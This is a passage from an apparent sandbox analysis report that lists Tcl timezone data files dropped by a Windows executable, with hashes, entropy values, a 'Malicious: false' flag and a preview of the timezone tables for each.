Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Davis) {. {-9223372036854775808 0 0 zzz}. {-409190400 25200 0 DAVT}. {-163062000 0 0 zzz}. {-28857600 25200 0 DAVT}. {1255806000 18000 0 DAVT}. {1268251200 25200 0 DAVT}. {1319742000 18000 0 DAVT}. {1329854400 25200 0 DAVT}.}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\DumontDUrville Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	207
Entropy (8bit):	4.841687980121893
Encrypted:	false
SSDEEP:	6:SlSWB9X52L0/3Om2OHajRX8azcJRJ6SXeKn:MBp52LdmdHajx8azkkK
MD5:	E4CD713CC96B408C1AF1128EE19C2683
SHA1:	E431DF0AF88DDAEB69B563BD2B75CCAC859DC66E
SHA-256:	415711270E2FB8F3DE8ABEF98E51810445520D6FFA9A384AC9C0973324CE9DA6
SHA-512:	420D8F397CB8B9BED0DCFA69B68FEF7A0B66AE6169FB3D40C9360EA2A86C6210225880E2CD000C468AF5B52B19A2B74E0E1D7ABB0AB6F05F9B2AE9D9C020DEC0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/DumontDUrville) {. {-9223372036854775808 0 0 zzz}. {-725846400 36000 0 PMT}. {-566992800 0 0 zzz}. {-415497600 36000 0 DDUT}.}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Macquarie Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2711
Entropy (8bit):	3.7678874480827362
Encrypted:	false
SSDEEP:	24:cQbTeU9U27sxijlil/iBq8DSmKP0BRke5VXyDouBtfpBFg87kniITjx:5dHYsiB8mfPuKgXyDDkVTd
MD5:	E819C7A5D5E4F6ECDA576F9E15E9F801
SHA1:	F8184CCF599B48499B9351467CAE493C14800A67
SHA-256:	0CE7410CFBF89B41E2DF7970BD67F66E84F2BC1FE8247403E6B1B0C22DD07FD3
SHA-512:	355DBB7C384E060DA09D488CDC16230B6CD07C8B7D68E3656B9D3F41331165C4C4A37A0267EB77DD9F2B70D21B28CD6F5EB870D4B952405C1B096F29682465C7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Macquarie) {. {-9223372036854775808 0 0 zzz}. {-2214259200 36000 0 EST}. {-1680508800 39600 1 EST}. {-1669892400 39600 0 EST}. {-1665392400 36000 0 EST}. {-1601719200 0 0 zzz}. {-94730400 36000 0 EST}. {-71136000 39600 1 EST}. {-55411200 36000 0 EST}. {-37267200 39600 1 EST}. {-25776000 36000 0 EST}. {-5817600 39600 1 EST}. {5673600 36000 0 EST}. {25632000 39600 1 EST}. {37728000 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {89136000 39600 1 EST}. {100022400 36000 0 EST}. {120585600 39600 1 EST}. {131472000 36000 0 EST}. {152035200 39600 1 EST}. {162921600 36000 0 EST}. {183484800 39600 1 EST}. {194976000 36000 0 EST}. {215539200 39600 1 EST}. {226425600 36000 0 EST}. {246988800 39600 1 EST}. {257875200 36000 0 EST}. {278438400 39600 1 EST}. {289324800 36000 0 EST}. {309888000 39600 1 EST}. {320774400 360

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Mawson Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.828936781959796
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52L0GRHEzyedFkXGm2OHv/fCF/mVU/VPKVVFUysvUXS7tvn:SlSWB9X52L0zyEm2OHary/3sZBn
MD5:	78B2CE32973FB9701B7FE487B082941A
SHA1:	1A056555E64B2C7F7926B6A7F043049A2E93150D
SHA-256:	29472C5FAE7149AE3BC007D0BE4D1B1975E46F3BB77434832467C1326DF90AE2
SHA-512:	FD7DF0F9913A0E77F9F53F954A9EA16D616334DED7BAA41B1D54990C6458FFFB70CF2D5204288AD430833FFA36E22247144C4E624AEC1FF215EA79D92232869E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Mawson) {. {-9223372036854775808 0 0 zzz}. {-501206400 21600 0 MAWT}. {1255809600 18000 0 MAWT}.}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\McMurdo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7622
Entropy (8bit):	3.8026377608298607
Encrypted:	false
SSDEEP:	96:f7nBIc0fw4eJ7a1N1oKe13aNiWbF8sYBpYhuVn:fmc3J7a1N18QOs8
MD5:	B5FE072BBD26A6FA829CC92CA6031281
SHA1:	5D2E795065E9F8BF9420CE1C8C426C666B199EB8
SHA-256:	B0940B34E8263B390F663918407CDC210BA19EEF18DAB35A08268EA693514665
SHA-512:	A8F8A5112309D732257A3FB867BF6C6939F3CAA100D34B11EC2B0EE1320CE5334552FDC55A0273226B8A8A3CE03D9123C1FC79589BA18A57F2B226AC69DEE5EA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/McMurdo) {. {-9223372036854775808 0 0 zzz}. {-441849600 43200 0 NZST}. {152632800 46800 1 NZDT}. {162309600 43200 0 NZST}. {183477600 46800 1 NZDT}. {194968800 43200 0 NZST}. {215532000 46800 1 NZDT}. {226418400 43200 0 NZST}. {246981600 46800 1 NZDT}. {257868000 43200 0 NZST}. {278431200 46800 1 NZDT}. {289317600 43200 0 NZST}. {309880800 46800 1 NZDT}. {320767200 43200 0 NZST}. {341330400 46800 1 NZDT}. {352216800 43200 0 NZST}. {372780000 46800 1 NZDT}. {384271200 43200 0 NZST}. {404834400 46800 1 NZDT}. {415720800 43200 0 NZST}. {436284000 46800 1 NZDT}. {447170400 43200 0 NZST}. {467733600 46800 1 NZDT}. {478620000 43200 0 NZST}. {499183200 46800 1 NZDT}. {510069600 43200 0 NZST}. {530632800 46800 1 NZDT}. {541519200 43200 0 NZST}. {562082400 46800 1 NZDT}. {573573600 43200 0 NZST}. {594136800 46800 1 NZDT}. {605023200

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Palmer Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7659
Entropy (8bit):	3.7915977499977096
Encrypted:	false
SSDEEP:	192:a+JjG3dUUugM981gh+tLIzx6z31ho1VmTfE3rZZ1LqdkG7xd28y+j2TjMjjInyWj:aPpf2RsU
MD5:	7C105A8876F32A4906DA75FC4B5D32D9
SHA1:	8A8BF10D2693A23779A601FA5ECE7C213D8D1E1E
SHA-256:	C6771DC4BF2D1BC7059B64182C6D8FE2897751778F1A6636BDFF49190472E8EC
SHA-512:	81E287B9ADFC703C91D7D04316D13351F08E89E6BF75652E9F31EB5B8D62F4F9C072CB03BF831FF972A997DA7524B924EB4F5D3997B4059CD4735446847C8000
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Palmer) {. {-9223372036854775808 0 0 zzz}. {-157766400 -14400 0 ART}. {-152654400 -14400 0 ART}. {-132955200 -10800 1 ARST}. {-121122000 -14400 0 ART}. {-101419200 -10800 1 ARST}. {-86821200 -14400 0 ART}. {-71092800 -10800 1 ARST}. {-54766800 -14400 0 ART}. {-39038400 -10800 1 ARST}. {-23317200 -14400 0 ART}. {-7588800 -10800 0 ART}. {128142000 -7200 1 ARST}. {136605600 -10800 0 ART}. {389070000 -14400 0 CLT}. {403070400 -10800 1 CLST}. {416372400 -14400 0 CLT}. {434520000 -10800 1 CLST}. {447822000 -14400 0 CLT}. {466574400 -10800 1 CLST}. {479271600 -14400 0 CLT}. {498024000 -10800 1 CLST}. {510721200 -14400 0 CLT}. {529473600 -10800 1 CLST}. {545194800 -14400 0 CLT}. {560923200 -10800 1 CLST}. {574225200 -14400 0 CLT}. {591768000 -10800 1 CLST}. {605674800 -14400 0 CLT}. {624427200 -10800 1 CLST}. {637729200 -14400 0 CLT}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Rothera Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	146
Entropy (8bit):	4.897451485949667
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52L0GRHEsKRaXGm2OHv/fCF/F/H3VVFVtC:SlSWB9X52L0rRhm2OHa//VVF7C
MD5:	D0D77DD1FC371697C5C41A84CCA4C362
SHA1:	1EE9D25A49B17B384F459E48E48626ED2529FDAA
SHA-256:	099ECC8A06D74A92758F619AED115F42F490D0AC515568D7308DDD29AE148503
SHA-512:	0BDFDA36EC0F16511CDBDA2A938944081ECA746755175C12C09F6CCCA83F449A922DAF18268E17BA3D3DE8319C21152A39EB26AB6CA855F0C18A9263086BE0ED
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Rothera) {. {-9223372036854775808 0 0 zzz}. {218246400 -10800 0 ROTT}.}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\South_Pole Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	199
Entropy (8bit):	4.807055248079355
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y16zyVAIgz6O62L0tlo+p4L0z6t:MBaIM9S2LMq+p4Lx
MD5:	FFEA1D1DBF48DAC6100EA2C159970EA3
SHA1:	1DFEB24F91BEE218EBDDD412AC2588C2E2A06842
SHA-256:	B641256D1E0281E006A3EDB9CD2BC5DEC124FF5DC62653EB4199D4196470D343
SHA-512:	352483E1D1DC50B664C1F34BF70738533FD325E1F61B148CD89580CA6CA0B5CDEF73DE96D877A93ACB30CA497273931044DA90F09E6B5534272B07D1621912D6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Antarctica/McMurdo)]} {. LoadTimeZoneFile Antarctica/McMurdo.}.set TZData(:Antarctica/South_Pole) $TZData(:Antarctica/McMurdo).

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Syowa Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.870240083017443
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52L0GRHEtWlFeEXGm2OHv/fCF/noMdMbv:SlSWB9X52L0tQeLm2OHaRbK
MD5:	ECA41775A0B086F9793055251447D1A8
SHA1:	7D760E1811F5893122659434E2B2DA0128210D6E
SHA-256:	6372A7C104A8C5A49F223F78909201A8BEB6A4A494D56FE3EE075481E6F4A3A8
SHA-512:	48428C664D224AA6D140EE085C889821F7A4558BA55E6563EC22DCBE4BB96DAEA3ECFFDA607211EFC763FB17B940C91679698049D57E980ABCC0201E442AFCB0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Syowa) {. {-9223372036854775808 0 0 zzz}. {-407808000 10800 0 SYOT}.}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Vostok Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.889998800024563
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52L0GRHEoKcMFtXGm2OHv/fCF/gd/bVFXKVVFJtvn:SlSWB9X52L0XcMFEm2OHaqVFXK/Nn
MD5:	A75528ECB73AA4F1A40182E54C69246C
SHA1:	390AE655C44523ABBC4D84925E84795F2822FA6B
SHA-256:	53C302E681EDFCBE0A0B757DEC7A1E0CA584E2D8A5EE3D4BFDBEBE4C71AEE02A
SHA-512:	7ABEBEDE35059F6AB73DB952475D94E7D76AC1A433C6E3568262AD84ABF92B24B3E3D5FE373709D35079E74379BBC77B8C19D2DF7CC852239294717FFAE758C9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Vostok) {. {-9223372036854775808 0 0 zzz}. {-380073600 21600 0 VOST}.}.

C:\Users\user\Desktop\tcl\tzdata\Arctic\Longyearbyen Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.922114908130109
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVyWJooedVAIgoqxWJ0YF2XbeLo4cA4FH/h8QasWJ/n:SlSWB9IZaM3ymSDdVAIgo2Q2XbUyAK8H
MD5:	0F69284483D337DC8202970461A28386
SHA1:	0D4592B8EBE070119CB3308534FE9A07A758F309
SHA-256:	3A5DB7C2C71F95C495D0884001F82599E794118452E2748E95A7565523546A8E
SHA-512:	D9F2618B153BFE4888E893A62128BE0BD59DFAFC824DA629454D5D541A9789536AC029BF73B6E9749409C522F450D53A270D302B2CF084444EA64D9138D77DFE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Oslo).

C:\Users\user\Desktop\tcl\tzdata\Asia\Aden Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	140
Entropy (8bit):	4.921606277899897
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKzFkXGm2OH8vvToJWVVvwvYv:SlSWB9X52wKlm2OH8vLoIVV
MD5:	B5AE25B0A567A7BF1E4FE66243C7A452
SHA1:	D8281C28B4226E1614A66BF8CE9E04F071DA205A
SHA-256:	E49C7E468587FC88D2B4FAF72AD0F37DE15391D349F6049EA48622DBF7E8E5D1
SHA-512:	B87FFF120BC1A24DE31C184049CA28301BA32C433D510F02EB1034BFB53BD6335553FE52F2CDFD0FCE2C5D502FDA7CB43690760DD515E42293DD33923F162506
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aden) {. {-9223372036854775808 10794 0 LMT}. {-631162794 10800 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Almaty Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1627
Entropy (8bit):	3.956903784715755
Encrypted:	false
SSDEEP:	48:5CeyeBebweJq7eqeS7eWqeUeVerePwehe0eNNeGeIOeoe4eieV7epeGqeUeuecea:R74bxTDpWDF8C5YlNkvIH5JrQwGDFn9a
MD5:	CC9C35479B78031C20B1E7BB17DBC970
SHA1:	9E5D894B8B50466F2FFEA9F6AF3022BEDDE8A8CA
SHA-256:	CFF6D1A1EB22F1F425C996F18427F96B3920D945A0EAF028D752A5717CC4A588
SHA-512:	ADD0CF752F0B00C4894EA7A8475D3A1F01CEF3195A6F09993508BB006C1B0F74FB4AA56F0D4D6756D9BAAAB1995F89B8C75D2178284F21AA11286B5B2378FEE7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Almaty) {. {-9223372036854775808 18468 0 LMT}. {-1441170468 18000 0 ALMT}. {-1247547600 21600 0 ALMT}. {354909600 25200 1 ALMST}. {370717200 21600 0 ALMT}. {386445600 25200 1 ALMST}. {402253200 21600 0 ALMT}. {417981600 25200 1 ALMST}. {433789200 21600 0 ALMT}. {449604000 25200 1 ALMST}. {465336000 21600 0 ALMT}. {481060800 25200 1 ALMST}. {496785600 21600 0 ALMT}. {512510400 25200 1 ALMST}. {528235200 21600 0 ALMT}. {543960000 25200 1 ALMST}. {559684800 21600 0 ALMT}. {575409600 25200 1 ALMST}. {591134400 21600 0 ALMT}. {606859200 25200 1 ALMST}. {622584000 21600 0 ALMT}. {638308800 25200 1 ALMST}. {654638400 21600 0 ALMT}. {662666400 21600 0 ALMT}. {694202400 21600 0 ALMT}. {701802000 25200 1 ALMST}. {717523200 21600 0 ALMT}. {733262400 25200 1 ALMST}. {748987200 21600 0 ALMT}. {764712000 25200 1 ALMST}. {780436800 21600 0 ALMT}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Amman Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7085
Entropy (8bit):	3.6214039838482117
Encrypted:	false
SSDEEP:	96:Rnv8A4XkyKfUN9QX4kFpej4g2uMekzdgyvwKVuKEZhfuITrar2gsq0teU:RvMw2yZp+4g2PxbLS5
MD5:	3F233E9C8DFD54121C4B3962B7E0EFE0
SHA1:	47B71500F158E0C84F642A2A1D0179F7D05DE406
SHA-256:	55487242457983A1157FA9EEE2FAF0B2F2B0402F8E15340314227CA9995228D0
SHA-512:	CC1AF2CFF1F1413CAF998DBD1CEF3430E19B36886089445E5185847AD75F89EFD39856F72071B38DB5C5687AAC7E254CF6C92598DDCD821CC70AB0FF38BF57EE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Amman) {. {-9223372036854775808 8624 0 LMT}. {-1230776624 7200 0 EET}. {108165600 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {215643600 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EET}. {262735200 10800 1 EEST}. {275950800 7200 0 EET}. {481154400 10800 1 EEST}. {496962000 7200 0 EET}. {512949600 10800 1 EEST}. {528670800 7200 0 EET}. {544399200 10800 1 EEST}. {560120400 7200 0 EET}. {575848800 10800 1 EEST}. {592174800 7200 0 EET}. {610581600 10800 1 EEST}. {623624400 7200 0 EET}. {641167200 10800 1 EEST}. {655074000 7200 0 EET}. {671839200 10800 1 EEST}. {685918800 7200 0 EET}. {702856800 10800 1 EEST}. {717973200 7200 0 EET}. {733701600 10800 1 EEST}. {749422800 7200 0 EET}. {765151200 10800 1

C:\Users\user\Desktop\tcl\tzdata\Asia\Anadyr Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2126
Entropy (8bit):	3.9059727754043094
Encrypted:	false
SSDEEP:	48:5l1wikTTFLDQg/c1l9U7z/viKX2jO61kd9Outd1rq92Eb6LqeJ3f686bzQ:71wikHFNiKX2jAwIvUs
MD5:	C8D90F85B9D4DBE3D8C0C0034703A5A0
SHA1:	F38B93DABD7F96EBC21F854F782709ECE7AE2867
SHA-256:	89D9194E2CC512F5AD13C4081DF3BE8FEA893B97BDD2483155A88BF481397CCE
SHA-512:	1B85DA900D0E34E7127E238150CE15491713C5261AA2523E049C16CDD6CAB854FB2A506AFC8B27F3D1178FEE74B997743019C973454368DBDDFA2488D2340E56
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Anadyr) {. {-9223372036854775808 42596 0 LMT}. {-1441194596 43200 0 ANAT}. {-1247572800 46800 0 ANAMMTT}. {354884400 50400 1 ANAST}. {370692000 46800 0 ANAT}. {386420400 43200 0 ANAMMTT}. {386424000 46800 1 ANAST}. {402231600 43200 0 ANAT}. {417960000 46800 1 ANAST}. {433767600 43200 0 ANAT}. {449582400 46800 1 ANAST}. {465314400 43200 0 ANAT}. {481039200 46800 1 ANAST}. {496764000 43200 0 ANAT}. {512488800 46800 1 ANAST}. {528213600 43200 0 ANAT}. {543938400 46800 1 ANAST}. {559663200 43200 0 ANAT}. {575388000 46800 1 ANAST}. {591112800 43200 0 ANAT}. {606837600 46800 1 ANAST}. {622562400 43200 0 ANAT}. {638287200 46800 1 ANAST}. {654616800 43200 0 ANAT}. {670341600 39600 0 ANAMMTT}. {670345200 43200 1 ANAST}. {686070000 39600 0 ANAT}. {695746800 43200 0 ANAMMTT}. {701780400 46800 1 ANAST}. {717501600 43200 0 ANAT}. {733240800 46800

C:\Users\user\Desktop\tcl\tzdata\Asia\Aqtau Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1684
Entropy (8bit):	3.971554616694357
Encrypted:	false
SSDEEP:	24:cQJeoR910JIhf6ZZKIYOdaV2K7LOtadYOWbgqwecyXE0uU914QlLY8uaX6:5XAIhf6KINmB21aN
MD5:	F57B92336C0F84BEF426E8A3D472C9B1
SHA1:	3269B8E9E0593A3D40761526D737FD4FFF55F052
SHA-256:	D89D07789291AA562A5080603D9D65AE3F1DE4B430737177747A8FCCFE61EC4B
SHA-512:	7ED92CCA7263B4492161EC8F2E6FD91EDE70A84BA660C6A3A0FDBD6554D80B993E57419AE3842E0E29380F1EAAEEAB96633B2F1443D82008FBC160F1F98308C0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtau) {. {-9223372036854775808 12064 0 LMT}. {-1441164064 14400 0 FORT}. {-1247544000 18000 0 FORT}. {-220942800 18000 0 SHET}. {370724400 21600 0 SHET}. {386445600 18000 0 SHET}. {386449200 21600 1 SHEST}. {402256800 18000 0 SHET}. {417985200 21600 1 SHEST}. {433792800 18000 0 SHET}. {449607600 21600 1 SHEST}. {465339600 18000 0 SHET}. {481064400 21600 1 SHEST}. {496789200 18000 0 SHET}. {512514000 21600 1 SHEST}. {528238800 18000 0 SHET}. {543963600 21600 1 SHEST}. {559688400 18000 0 SHET}. {575413200 21600 1 SHEST}. {591138000 18000 0 SHET}. {606862800 21600 1 SHEST}. {622587600 18000 0 SHET}. {638312400 21600 1 SHEST}. {654642000 18000 0 SHET}. {662670000 18000 0 SHET}. {692823600 18000 0 AQTT}. {701805600 21600 1 AQTST}. {717526800 18000 0 AQTT}. {733266000 21600 1 AQTST}. {748990800 18000 0 AQTT}. {764715600 21600 1 AQTST}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Aqtobe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1656
Entropy (8bit):	3.8964942154031177
Encrypted:	false
SSDEEP:	24:cQFLeAQkaIz7c7hGQERlP9oIfgy+4d6X5rfMKBvLO913bIwnzC4:5FGIz7c7hGQERpSIfB+Q6X9fDBS3b
MD5:	EEF32CC834FADB107C645CC5B036298A
SHA1:	770DE2AC8995F7AF012D6CD3A269FEBEE5965289
SHA-256:	1732062E5FEEAE6EE22F9D31B932DB32D373C29471917BC8CA9B37F008AAA531
SHA-512:	41E8E1A7947B5A9522746ACF98ED4C8DBF195ABB7F91A3F250ACFE2643F1A76B9A528FC29D6B0BFFE50AEA2865DAA2C5CC60238A23949A76B146324AE245EFEE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtobe) {. {-9223372036854775808 13720 0 LMT}. {-1441165720 14400 0 AKTT}. {-1247544000 18000 0 AKTT}. {354913200 21600 1 AKTST}. {370720800 21600 0 AKTT}. {386445600 18000 0 AKTT}. {386449200 21600 1 AKTST}. {402256800 18000 0 AKTT}. {417985200 21600 1 AKTST}. {433792800 18000 0 AKTT}. {449607600 21600 1 AKTST}. {465339600 18000 0 AKTT}. {481064400 21600 1 AKTST}. {496789200 18000 0 AKTT}. {512514000 21600 1 AKTST}. {528238800 18000 0 AKTT}. {543963600 21600 1 AKTST}. {559688400 18000 0 AKTT}. {575413200 21600 1 AKTST}. {591138000 18000 0 AKTT}. {606862800 21600 1 AKTST}. {622587600 18000 0 AKTT}. {638312400 21600 1 AKTST}. {654642000 18000 0 AKTT}. {662670000 18000 0 AKTT}. {692823600 18000 0 AQTT}. {701805600 21600 1 AQTST}. {717526800 18000 0 AQTT}. {733266000 21600 1 AQTST}. {748990800 18000 0 AQTT}. {764715600 21600 1 AQTST}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Ashgabat Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.093280687935826
Encrypted:	false
SSDEEP:	12:MBp52gZmdHRV9IDOo3sjkhWF47ZKUjfmWnmjQIyhxdtrsjmWdjDe2WZlyXToDX3A:cQgZeRHIMwhXwb1kIw6do3kToT3CPV
MD5:	9E1A83332FA045AAF785B8956DE331B2
SHA1:	6228E8B105D8052D64D7C9965D1624F629D5E2DD
SHA-256:	D8222AEB02E04141B35FDE9CF957422E40AF7611D7814A624AD2395E7EF5799C
SHA-512:	7E7BA6DDD3A79DB1C912E0898DDA22DDDD9ABE6EAE5667268BC18BD2993995598C9CDFF7104ACAC1C8A28B5BDCA90734808ED1687371693BF9922195658A3A15
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ashgabat) {. {-9223372036854775808 14012 0 LMT}. {-1441166012 14400 0 ASHT}. {-1247544000 18000 0 ASHT}. {354913200 21600 1 ASHST}. {370720800 18000 0 ASHT}. {386449200 21600 1 ASHST}. {402256800 18000 0 ASHT}. {417985200 21600 1 ASHST}. {433792800 18000 0 ASHT}. {449607600 21600 1 ASHST}. {465339600 18000 0 ASHT}. {481064400 21600 1 ASHST}. {496789200 18000 0 ASHT}. {512514000 21600 1 ASHST}. {528238800 18000 0 ASHT}. {543963600 21600 1 ASHST}. {559688400 18000 0 ASHT}. {575413200 21600 1 ASHST}. {591138000 18000 0 ASHT}. {606862800 21600 1 ASHST}. {622587600 18000 0 ASHT}. {638312400 21600 1 ASHST}. {654642000 18000 0 ASHT}. {670366800 14400 0 ASHT}. {670370400 18000 1 ASHST}. {686095200 14400 0 ASHT}. {695772000 18000 0 TMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Ashkhabad Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	177
Entropy (8bit):	4.750782589043179
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8xEYM4DdVAIgN/ZEYvCHt2WFKUNSH+WFKYEYMvn:SlSWB9IZaM3yRhVAIgH1CHt2wKUNSewa
MD5:	73E1F618FB430C503A1499E3A0298C97
SHA1:	29F31A7C9992F9D9B3447FCBC878F1AF8E4BD57F
SHA-256:	5917FC603270C0470D2EC416E6C85E999A52B6A384A2E1C5CFC41B29ABCA963A
SHA-512:	FAE39F158A4F47B4C37277A1DC77B8524DD4287EBAD5D8E6CBB906184E6DA275A308B55051114F4CD4908B449AE3C8FD48384271E3F7106801AD765E5958B4DD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ashgabat)]} {. LoadTimeZoneFile Asia/Ashgabat.}.set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat).

C:\Users\user\Desktop\tcl\tzdata\Asia\Baghdad Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1643
Entropy (8bit):	3.8265567749629983
Encrypted:	false
SSDEEP:	24:cQcTe0yFHi6Uf4DUfKUfKmF7mUffcqbUfgNqcUfZUfKUfAaUfaMZUflCUfzbS/UY:5cpmpPmFrLNquvStD1XJtgCx
MD5:	7A1020270EA06F2E77AC92F960A6D389
SHA1:	DD47A64D16E9E95FE42650B38AAC422E011EF51F
SHA-256:	C15E1710D2287D9D05D22F8F594BBFDAC8C890F84DCADB4EB833177FE4B27627
SHA-512:	C654A32D668121CE4F6D041520CD588E10698DAF85BF187C2FCB97FB0982934D7C4A252A2044ED806828F5EC4713652C5F45B22B3A22073DAD9897097BD4652B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baghdad) {. {-9223372036854775808 10660 0 LMT}. {-2524532260 10656 0 BMT}. {-1641005856 10800 0 AST}. {389048400 14400 0 ADT}. {402264000 10800 0 AST}. {417906000 14400 1 ADT}. {433800000 10800 0 AST}. {449614800 14400 1 ADT}. {465422400 10800 0 AST}. {481150800 14400 1 ADT}. {496792800 10800 0 AST}. {512517600 14400 1 ADT}. {528242400 10800 0 AST}. {543967200 14400 1 ADT}. {559692000 10800 0 AST}. {575416800 14400 1 ADT}. {591141600 10800 0 AST}. {606866400 14400 1 ADT}. {622591200 10800 0 AST}. {638316000 14400 1 ADT}. {654645600 10800 0 AST}. {670464000 14400 1 ADT}. {686275200 10800 0 AST}. {702086400 14400 1 ADT}. {717897600 10800 0 AST}. {733622400 14400 1 ADT}. {749433600 10800 0 AST}. {765158400 14400 1 ADT}. {780969600 10800 0 AST}. {796694400 14400 1 ADT}. {812505600 10800 0 AST}. {828316800 14400 1 ADT}. {844128000 1

C:\Users\user\Desktop\tcl\tzdata\Asia\Bahrain Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.877533718022302
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKENUKMFeHkXGm2OHlpoevUQKCebVVGF5FRVGwvYv:SlSWB9X52wKENUSm2OHlGeRwzGfFRVS
MD5:	466B4C86DE92AD98141F5D3076CF9E8C
SHA1:	C19DC60C48EC39F621293CF52A9ACE5B676A09DF
SHA-256:	1029EE833063C9BB4B606222843A693814F255540D53299FA904FC969B1D6D1A
SHA-512:	3065DA8B197EA8D9BD82F9EB1CDEF96B445054068DFA45000ECB0981E2FBD8FB2CFF002F22B3FAADC04BBE3554377FBC7A15A6801B63642C54AD8490BB613F99
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bahrain) {. {-9223372036854775808 12140 0 LMT}. {-1577935340 14400 0 GST}. {76190400 10800 0 AST}.}.

